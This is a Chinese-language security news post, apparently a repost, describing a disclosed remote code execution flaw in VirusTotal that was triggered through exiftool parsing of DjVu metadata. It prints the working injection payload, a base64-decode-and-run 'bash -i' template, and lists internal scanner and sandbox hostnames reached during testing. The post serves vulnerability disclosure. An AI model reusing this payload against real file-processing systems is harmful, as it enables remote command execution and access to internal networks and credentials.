VirusTotal远程代码执行漏洞

admin 2022年5月8日14:46:49评论66 views字数 1660阅读5分32秒阅读模式

VirusTotal远程代码执行漏洞

研究人员发现VirusTotal平台存在远程代码执行漏洞。

virustotal.com应用有超过70个反病毒扫描器,可以对用户上传的文件和URL进行病毒扫描。研究人员发现截图在VirusTotal平台远程执行任意命令,并获取VirusTotal平台提供的不同的扫描能力。

VirusTotal远程代码执行漏洞

技术细节

第一步是上传一个djvu文件到URL https://www.virustotal.com/gui/,payload为:

content: (metadata "c${system('bash -c "{echo,BASE64-ENCODED-COMMAND-TO-BE-EXECUTED }|{base64,-d }|{bash,-i }" ; clear') };")

Virustotal.com会分析该文件,但没有发现条件到metadata中的payload数据。

根据virustotal.com官方文档(https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works),virustotal.com会使用不同的扫描器。应用会发送包含payload的文件给不同的主机来执行扫描。

VirusTotal远程代码执行漏洞

在virustotal主机上,exiftool工具被执行时,就会执行payload:

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

然后,研究人员发现这并不是一个谷歌控制的环境,而是与virustotal项目中内部扫描器与合作伙伴相关的环境。在测试中,有可能获得超过50个内部主机的访问权限。内网中识别的主机有:

VirusTotal远程代码执行漏洞

172-24-241-97.kamala-prober.zion-rel.svc.cluster.local

kubernetes.default.svc.cluster.local - 172.19.0.1

scanner--rel--kaspersky-244.headless-rel-kaspersky.zion-rel.svc.cluster.local

scanner--rel--kaspersky-249.headless-rel-kaspersky.zion-rel.svc.cluster.local

scanner--rel--kaspersky-279.headless-rel-kaspersky.zion-rel.svc.cluster.local

scanner--rel--kaspersky-339.headless-rel-kaspersky.zion-rel.svc.cluster.local

scanner--rel--typer-7b4c979bc9-bskr8 scanner--zzbm--typer-7b4c979bc9-cf5f7

gaea.qianxin-inc.cn.qianxin-inc.cn

sandk8s23.dlc.zzbm.360es.cn

sandk8s24.dlc.zzbm.qianxin-inc.cn

sandk8s25.dlc.zzbm.qianxin-inc.cn

sandk8s26.dlc.zzbm.360es.cn

sandk8s27.dlc.zzbm.360es.cn

sandk8s28.dlc.zzbm.qianxin-inc.cn

VirusTotal远程代码执行漏洞

每当研究人员上传一个含有新payload的文件(哈希值不同)时,virustotal会转发payload到其他主机:

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

研究人员发现网络中有不同类型的服务,包括mysql、Kubernetes、oracle数据库、http和https应用、SSH等。

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

因为实现了非授权的访问,就可以获得敏感和关键信息,包括Kubernetes tokens和证书、服务设置信息、源代码、日志信息等。

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

漏洞时间轴

研究人员在2021年4月30日提交该漏洞给谷歌,谷歌在2022年1月13日修复该漏洞。

参考及来源:https://www.cysrc.com/blog/virus-total-blog

VirusTotal远程代码执行漏洞

VirusTotal远程代码执行漏洞

原文始发于微信公众号(嘶吼专业版):VirusTotal远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月8日14:46:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VirusTotal远程代码执行漏洞http://cn-sec.com/archives/974843.html

发表评论

匿名网友 填写信息